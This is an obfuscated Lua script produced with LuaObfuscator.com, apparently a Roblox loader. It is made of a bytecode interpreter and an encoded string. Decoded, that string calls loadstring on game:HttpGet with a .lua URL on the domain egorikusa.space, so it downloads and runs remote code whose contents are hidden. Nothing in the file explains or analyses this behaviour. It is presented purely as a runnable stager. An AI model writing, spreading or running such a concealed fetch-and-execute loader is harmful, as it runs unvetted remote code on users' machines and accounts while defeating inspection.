--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v82=0;local v83;while true do if (v82==0) then v83=v2(v0(v30,16));if v19 then local v99=v5(v83,v19);v19=nil;return v99;else return v83;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v84=0;local v85;while true do if (v84==(0 -0)) then v85=(v31/(2^(v32-(2 -1))))%(((3 + 0) -1)^(((v33-(2 -1)) -(v32-(620 -((790 -235) + 64)))) + 1)) ;return v85-(v85%(932 -(857 + (1139 -(68 + 997))))) ;end end else local v86=568 -((1637 -(226 + 1044)) + 201) ;local v87;while true do if (v86==(927 -(214 + 713))) then v87=(1 + 1)^(v32-(1 + 0)) ;return (((v31%(v87 + v87))>=v87) and (878 -(282 + (2590 -1995)))) or (1637 -(1523 + 114)) ;end end end end local function v21() local v34=117 -(32 + 85) ;local v35;while true do if (v34==(1 + 0)) then return v35;end if (v34==0) then v35=v1(v16,v18,v18);v18=v18 + 1 ;v34=1 + 0 ;end end end local function v22() local v36=957 -(655 + 237 + 65) ;local v37;local v38;while true do if (v36==(2 -1)) then return (v38 * (472 -216)) + v37 ;end if (v36==0) then v37,v38=v1(v16,v18,v18 + (3 -1) );v18=v18 + (352 -(87 + 263)) ;v36=(444 -263) -(67 + 113) ;end end end local function v23() local v39,v40,v41,v42=v1(v16,v18,v18 + 3 );v18=v18 + 3 + 1 ;return (v42 * (66680831 -(90523321 -40619706))) + (v41 * (66488 -(802 + 110 + 40))) + (v40 * (689 -433)) + v39 ;end local function v24() local v43=v23();local v44=v23();local v45=(1428 -(44 + 386)) -((2401 -(998 + 488)) + 82) ;local v46=(v20(v44,2 -1 ,4 + 8 + 8 ) * ((2 -0)^(1219 -(1069 + 118)))) + v43 ;local v47=v20(v44,47 -26 ,31);local v48=((v20(v44,69 -37 )==(1 + 0)) and  -(1 -0)) or (1 + 0) ;if (v47==(791 -(368 + 423))) then if (v46==(0 + 0)) then return v48 * (0 -0) ;else v47=(791 -(201 + 571)) -(10 + 8) ;v45=0 -0 ;end elseif (v47==(2489 -((1554 -(116 + 1022)) + 26))) then return ((v46==(0 -0)) and (v48 * ((1 + 0)/0))) or (v48 * NaN) ;end return v8(v48,v47-1023 ) * (v45 + (v46/((3 -1)^(490 -(145 + 293))))) ;end local function v25(v49) local v50;if  not v49 then v49=v23();if (v49==(0 -0)) then return "";end end v50=v3(v16,v18,(v18 + v49) -(1 + 0) );v18=v18 + v49 ;local v51={};for v65=1, #v50 do v51[v65]=v2(v1(v3(v50,v65,v65)));end return v6(v51);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=(function() return 0;end)();local v53=(function() return;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();while true do local v67=(function() return 0 + 0 ;end)();while true do if (v67==(1 + 0)) then if ((2 + 0)~=v52) then else for v100= #"[",v23() do local v101=(function() return 0;end)();local v102=(function() return;end)();local v103=(function() return;end)();while true do if (v101==(397 -(115 + 281))) then while true do if (v102==(0 -0)) then v103=(function() return v21();end)();if (v20(v103, #"!", #"[")==(0 + 0)) then local v163=(function() return 1271 -(945 + 326) ;end)();local v164=(function() return;end)();local v165=(function() return;end)();local v166=(function() return;end)();while true do if (v163==(4 -2)) then if (v20(v165, #">", #"|")== #"~") then v166[7 -5 ]=(function() return v58[v166[2 + 0 ]];end)();end if (v20(v165,869 -(550 + 317) ,2)== #"[") then v166[ #"xxx"]=(function() return v58[v166[ #"91("]];end)();end v163=(function() return 3 -0 ;end)();end if (v163==(3 -0)) then if (v20(v165, #"19(", #"xxx")== #">") then v166[ #"0313"]=(function() return v58[v166[ #"0836"]];end)();end v53[v100]=(function() return v166;end)();break;end if ((2 -1)~=v163) then else local v169=(function() return 0 + 0 ;end)();while true do if (0==v169) then v166=(function() return {v22(),v22(),nil,nil};end)();if (v164==(1500 -(1408 + 92))) then local v177=(function() return 1665 -(970 + 695) ;end)();local v178=(function() return;end)();while true do if (v177==0) then v178=(function() return 0 -0 ;end)();while true do if (v178==(1990 -(582 + 1408))) then v166[ #"asd"]=(function() return v22();end)();v166[ #"?id="]=(function() return v22();end)();break;end end break;end end elseif (v164== #"~") then v166[ #"-19"]=(function() return v23();end)();elseif (v164==(6 -4)) then v166[ #"asd"]=(function() return v23() -((1173 -(418 + 753))^(7 + 9)) ;end)();elseif (v164== #"gha") then local v183=(function() return 0 -0 ;end)();local v184=(function() return;end)();while true do if ((0 + 0)==v183) then v184=(function() return 0 + 0 ;end)();while true do if (v184==(0 -0)) then v166[ #"asd"]=(function() return v23() -((1826 -(1195 + 629))^16) ;end)();v166[ #".dev"]=(function() return v22();end)();break;end end break;end end end v169=(function() return 530 -(406 + 123) ;end)();end if (1==v169) then v163=(function() return 1771 -(1749 + 20) ;end)();break;end end end if (v163==(0 -0)) then local v170=(function() return 1322 -(1249 + 73) ;end)();while true do if (v170~=(242 -(187 + 54))) then else v163=(function() return 1 + 0 ;end)();break;end if (v170~=(780 -(162 + 618))) then else v164=(function() return v20(v103,2, #"91(");end)();v165=(function() return v20(v103, #"?id=",6);end)();v170=(function() return 1 + 0 ;end)();end end end end end break;end end break;end if (v101~=(0 + 0)) then else local v112=(function() return 0 -0 ;end)();while true do if (v112~=1) then else v101=(function() return 1 -0 ;end)();break;end if (v112==(0 -0)) then v102=(function() return 0 + 0 ;end)();v103=(function() return nil;end)();v112=(function() return 1637 -(1373 + 263) ;end)();end end end end end for v104= #"{",v23() do v54[v104-#"}" ]=(function() return v28();end)();end return v56;end break;end if (v67==0) then if (v52== #"[") then local v95=(function() return 1000 -(451 + 549) ;end)();local v96=(function() return;end)();while true do if (v95==0) then v96=(function() return 0 + 0 ;end)();while true do if (v96==(1 + 0)) then for v147= #"<",v57 do local v148=(function() return 0 -0 ;end)();local v149=(function() return;end)();local v150=(function() return;end)();local v151=(function() return;end)();while true do if (v148~=0) then else local v167=(function() return 0 -0 ;end)();while true do if (v167==(1384 -(746 + 638))) then v149=(function() return 0 + 0 ;end)();v150=(function() return nil;end)();v167=(function() return 1 -0 ;end)();end if (v167==1) then v148=(function() return 1;end)();break;end end end if (v148==(2 -1)) then v151=(function() return nil;end)();while true do if (v149==(0 -0)) then local v171=(function() return 341 -(218 + 123) ;end)();local v172=(function() return;end)();while true do if ((1581 -(1535 + 46))==v171) then v172=(function() return 114 -(4 + 110) ;end)();while true do if ((0 + 0)~=v172) then else v150=(function() return v21();end)();v151=(function() return nil;end)();v172=(function() return 1 + 0 ;end)();end if (v172~=(561 -(306 + 254))) then else v149=(function() return  #"~";end)();break;end end break;end end end if (v149~= #"}") then else if (v150== #"{") then v151=(function() return v21()~=(0 + 0) ;end)();elseif (v150==2) then v151=(function() return v24();end)();elseif (v150~= #"91(") then else v151=(function() return v25();end)();end v58[v147]=(function() return v151;end)();break;end end break;end end end v56[ #"asd"]=(function() return v21();end)();v96=(function() return 3 -1 ;end)();end if (v96~=(0 + 0)) then else v57=(function() return v23();end)();v58=(function() return {};end)();v96=(function() return 1468 -(899 + 568) ;end)();end if (v96~=(2 + 0)) then else v52=(function() return 4 -2 ;end)();break;end end break;end end end if (0~=v52) then else local v97=(function() return 603 -(268 + 335) ;end)();local v98=(function() return;end)();while true do if ((290 -(60 + 230))~=v97) then else v98=(function() return 0 -0 ;end)();while true do if (v98~=(573 -(426 + 146))) then else v55=(function() return {};end)();v56=(function() return {v53,v54,nil,v55};end)();v98=(function() return 1 + 1 ;end)();end if (v98==(1456 -(282 + 1174))) then v53=(function() return {};end)();v54=(function() return {};end)();v98=(function() return 1 + 0 ;end)();end if (v98==(3 -1)) then v52=(function() return  #"|";end)();break;end end break;end end end v67=(function() return 812 -(569 + 242) ;end)();end end end end local function v29(v59,v60,v61) local v62=v59[66 -(30 + 35) ];local v63=v59[2 + 0 ];local v64=v59[(3034 -1774) -(1043 + 214) ];return function(...) local v68=v62;local v69=v63;local v70=v64;local v71=v27;local v72=3 -2 ;local v73= -(337 -(144 + 192));local v74={};local v75={...};local v76=v12("#",...) -(1 + 0) ;local v77={};local v78={};for v88=0,v76 do if (v88>=v70) then v74[v88-v70 ]=v75[v88 + (2 -1) ];else v78[v88]=v75[v88 + (581 -(361 + 219)) ];end end local v79=(v76-v70) + 1 ;local v80;local v81;while true do v80=v68[v72];v81=v80[(3195 -(1121 + 569)) -(363 + 1141) ];if ((v81<=(1584 -(1183 + 397))) or (1899<917)) then if (v81<=(321 -(53 + 267))) then if (v81==((214 -(22 + 192)) + 0)) then v78[v80[415 -(15 + 398) ]]=v80[985 -(18 + (1647 -(483 + 200))) ]~=(0 -0) ;else v78[v80[1465 -(1404 + 59) ]]={};end elseif (v81<=(2 + (0 -0))) then v78[v80[2 + 0 ]]();elseif (v81==3) then v78[v80[(1144 -292) -(20 + 830) ]]=v80[3];else local v115=1661 -(1477 + 184) ;local v116;local v117;local v118;local v119;while true do if (v115==(1 -0)) then v73=(v118 + v116) -((766 -(468 + 297)) + 0) ;v119=126 -((678 -(334 + 228)) + 10) ;v115=1 + 1 ;end if ((740 -(542 + (661 -465)))==v115) then for v158=v116,v73 do v119=v119 + (305 -(244 + 60)) ;v78[v158]=v117[v119];end break;end if ((v115==(0 -0)) or (4312<=876)) then v116=v80[1 + 1 ];v117,v118=v71(v78[v116](v13(v78,v116 + 1 + 0 ,v80[2 + 1 ])));v115=2 -1 ;end end end elseif (v81<=(1131 -(936 + 189))) then if (v81>(12 -7)) then local v108=v80[1615 -(1565 + 48) ];v78[v108]=v78[v108](v13(v78,v108 + 1 + 0 ,v73));else do return;end end elseif (v81<=(1145 -(782 + 356))) then v78[v80[1553 -((2609 -1483) + 425) ]]=v61[v80[408 -(118 + 287) ]];elseif ((2232<=2596) and (v81==(31 -23))) then local v120=0 -(0 -0) ;local v121;local v122;while true do if ((2095<3686) and (v120==(1121 -(118 + 1003)))) then v121=v80[5 -3 ];v122=v78[v80[3]];v120=378 -(142 + 235) ;end if (v120==1) then v78[v121 + (3 -2) ]=v122;v78[v121]=v122[v80[18 -14 ]];break;end end else local v123;local v124,v125;local v126;local v127;v78[v80[2]]={};v72=v72 + (1019 -(697 + 321)) ;v80=v68[v72];v78[v80[1 + 0 + 1 ]]=v61[v80[980 -(553 + 424) ]];v72=v72 + (1 -0) ;v80=v68[v72];v78[v80[2 + 0 ]]=v61[v80[3 + 0 ]];v72=v72 + 1 + (236 -(141 + 95)) ;v80=v68[v72];v127=v80[1 + 1 ];v126=v78[v80[2 + 1 + 0 ]];v78[v127 + (2 -1) ]=v126;v78[v127]=v126[v80[10 -(15 -9) ]];v72=v72 + (2 -1) ;v80=v68[v72];v78[v80[4 -(4 -2) ]]=v80[1 + 1 + 1 ];v72=v72 + (873 -(826 + 46)) ;v80=v68[v72];v78[v80[(24 -15) -7 ]]=v80[756 -(239 + 514) ]~=(0 -0) ;v72=v72 + 1 + 0 ;v80=v68[v72];v127=v80[1331 -(797 + 532) ];v124,v125=v71(v78[v127](v13(v78,v127 + 1 + 0 ,v80[(312 + 131) -(382 + 58) ])));v73=(v125 + v127) -1 ;v123=(0 + 0) -0 ;for v144=v127,v73 do local v145=0 + (0 -0) ;while true do if (v145==(0 -0)) then v123=v123 + (1203 -(373 + 829)) ;v78[v144]=v124[v123];break;end end end v72=v72 + (732 -(476 + 151 + 104)) ;v80=v68[v72];v127=v80[1132 -(369 + 761) ];v78[v127]=v78[v127](v13(v78,v127 + 1 + 0 ,v73));v72=v72 + (2 -1) ;v80=v68[v72];v78[v80[(165 -(92 + 71)) -(0 + 0) ]]();v72=v72 + (1 -0) ;v80=v68[v72];do return;end end v72=v72 + (1 -0) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403343Q00682Q7470733A2Q2F65676F72696B7573612E73706163652F366634303230662Q36623339663731346133642Q363063382E6C7561000A4Q00097Q00122Q000100013Q00122Q000200023Q00202Q00020002000300122Q000400046Q000500016Q000200056Q00013Q00024Q0001000100016Q00017Q00",v9(),...);
